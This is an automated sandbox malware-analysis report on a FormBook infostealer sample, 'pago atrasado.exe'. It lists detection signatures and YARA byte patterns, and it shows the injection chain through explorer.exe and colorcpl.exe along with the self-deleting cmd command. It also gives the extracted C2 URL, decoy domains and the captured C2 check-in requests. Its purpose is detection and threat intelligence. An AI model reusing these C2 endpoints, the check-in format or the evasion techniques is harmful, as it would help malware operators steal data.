Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report pago atrasado.exe

Overview

General Information

Sample Name:pago atrasado.exe
Analysis ID:502137
MD5:f841c72b1c4cadc4c98903ad26a96a16
SHA1:06359aaf42a5ce60889ab7a93d8af7702b34630a
SHA256:eaa038a0020fee7ddfe2919203f20f15ca1d7eb19d90b168cade93b5cf8d7f43
Tags:exeFormbookxloader
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • pago atrasado.exe (PID: 4308 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
    • pago atrasado.exe (PID: 2840 cmdline: 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F841C72B1C4CADC4C98903AD26A96A16)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 248 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 4940 cmdline: /c del 'C:\Users\user\Desktop\pago atrasado.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
    • 0x16af8:$sqlite3text: 68 38 2A 90 C5
    • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.1.pago atrasado.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.1.pago atrasado.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.1.pago atrasado.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
        • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
        • 0x16af8:$sqlite3text: 68 38 2A 90 C5
        • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
        • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
        1.2.pago atrasado.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.pago atrasado.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.crisisinterventionadvocates.com/u9xn/"], "decoy": ["lifeguardingcoursenearme.com", "bolsaspapelcdmx.com", "parsleypkllqu.xyz", "68134.online", "shopthatlookboutique.com", "canlibahisportal.com", "oligopoly.city", "srchwithus.online", "151motors.com", "17yue.info", "auntmarysnj.com", "hanansalman.com", "heyunshangcheng.info", "doorslamersplus.com", "sfcn-dng.com", "highvizpeople.com", "seoexpertinbangladesh.com", "christinegagnonjewellery.com", "artifactorie.biz", "mre3.net", "webbyteanalysis.online", "medicmir.store", "shdxh.com", "salvationshippingsecurity.com", "michita.xyz", "itskosi.com", "aligncoachingconsulting.com", "cryptorickclub.art", "cyliamartisbackup.com", "ttemola.com", "mujeresenfarmalatam.com", "mykombuchafactory.com", "irasutoya-ryou.com", "envtmyouliqy.mobi", "expert-rse.com", "oddanimalsink.com", "piezoelectricenergy.com", "itservices-india.com", "wintwiin.com", "umgaleloacademy.com", "everythangbutwhite.com", "ishhs.xyz", "brandsofcannabis.com", "sculptingstones.com", "hilldetailingllc.com", "stone-project.net", "rbrituelbeaute.com", "atzoom.store", "pronogtiki.store", "baybeg.com", "b148tlrfee9evtvorgm5947.com", "msjanej.com", "western-overseas.info", "sharpecommunications.com", "atlantahomesforcarguys.com", "neosudo.com", "blulacedefense.com", "profilecolombia.com", "blacksaltspain.com", "sejiw3.xyz", "saint444.com", "getoken.net", "joycegsy.com", "fezora.xyz"]}
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.pago atrasado.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.pago atrasado.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.pago atrasado.exe.2330000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.326494354.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.286357081.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.248580224.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326520078.0000000000910000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514967425.0000000002B00000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.249155539.0000000002330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.270365101.0000000006D43000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.511956241.00000000001B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.326181287.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.514678237.0000000002A00000.00000040.00020000.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: pago atrasado.exeJoe Sandbox ML: detected
          Source: 0.2.pago atrasado.exe.2330000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 16.2.colorcpl.exe.4a4796c.4.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 16.2.colorcpl.exe.2b2c88.1.unpackAvira: Label: TR/Patched.Ren.Gen
          Source: 1.2.pago atrasado.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.1.pago atrasado.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: pago atrasado.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402671 FindFirstFileA,
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 4x nop then pop ebx

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49790 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49793 -> 74.208.236.134:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49797 -> 3.64.163.50:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.crisisinterventionadvocates.com
          Source: C:\Windows\explorer.exeDomain query: www.ttemola.com
          Source: C:\Windows\explorer.exeNetwork Connect: 208.91.197.27 80
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeNetwork Connect: 46.101.121.244 80
          Source: C:\Windows\explorer.exeNetwork Connect: 74.208.236.134 80
          Source: C:\Windows\explorer.exeDomain query: www.baybeg.com
          Source: C:\Windows\explorer.exeDomain query: www.everythangbutwhite.com
          Source: C:\Windows\explorer.exeDomain query: www.highvizpeople.com
          Source: C:\Windows\explorer.exeDomain query: www.itskosi.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeDomain query: www.oddanimalsink.com
          Source: C:\Windows\explorer.exeDomain query: www.ishhs.xyz
          Source: C:\Windows\explorer.exeDomain query: www.sfcn-dng.com
          Source: C:\Windows\explorer.exeDomain query: www.umgaleloacademy.com
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.ishhs.xyz
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.crisisinterventionadvocates.com/u9xn/
          Source: Joe Sandbox ViewASN Name: CONFLUENCE-NETWORK-INCVG CONFLUENCE-NETWORK-INCVG
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=rzasM82ZF5Q0VpfmrNE4kv3GDdRAHDJpM3U8JxcA+ITN6WDsXwhhZ+Z3rxJnSB0jHUWg&PjlT=JhfHclW8zdo HTTP/1.1Host: www.highvizpeople.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Eyy2FmThgSczREyJUe5BPhqJIrAJD2iL3N0sS7pth5V4AuiiYZbYrcKb75E1rnMpvjAp&PjlT=JhfHclW8zdo HTTP/1.1Host: www.oddanimalsink.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=Q2BOOCh2YmRGzHBLpF4ZGgsAfzPJKYPCPJSLTy3o+TqCnIZHYQwJa/p1Zgpwk24Ey+uX&PjlT=JhfHclW8zdo HTTP/1.1Host: www.itskosi.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=LAjf/xx2BjlKOSx2Nw0FybGnOLdFfrA16q3xOuIsu5dbrvvju1demR4HH9h71lmoA2bo&PjlT=JhfHclW8zdo HTTP/1.1Host: www.crisisinterventionadvocates.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /u9xn/?z0=a5IGPNkliMrRjEJlFMTr6wLc8iEcWRvcvuUq3Ax8SYLvcABDJqlPe7bn0Dwhj5qYaiRJ&PjlT=JhfHclW8zdo HTTP/1.1Host: www.everythangbutwhite.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 208.91.197.27 208.91.197.27
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 14:44:25 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9601-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 13 Oct 2021 14:44:46 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.svg#open-sans-bold
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans-bold/open-sans-bold.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.eot?#iefix
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.otf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.svg#open-sans
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.ttf
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/fonts/open-sans/open-sans.woff2
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27586/searchbtn.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/BG_2.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Left.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/27587/Right.png)
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
          Source: pago atrasado.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: pago atrasado.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.Highvizpeople.com
          Source: colorcpl.exe, 00000010.00000002.517690406.0000000004BC2000.00000004.00020000.sdmpString found in binary or memory: http://www.everythangbutwhite.com
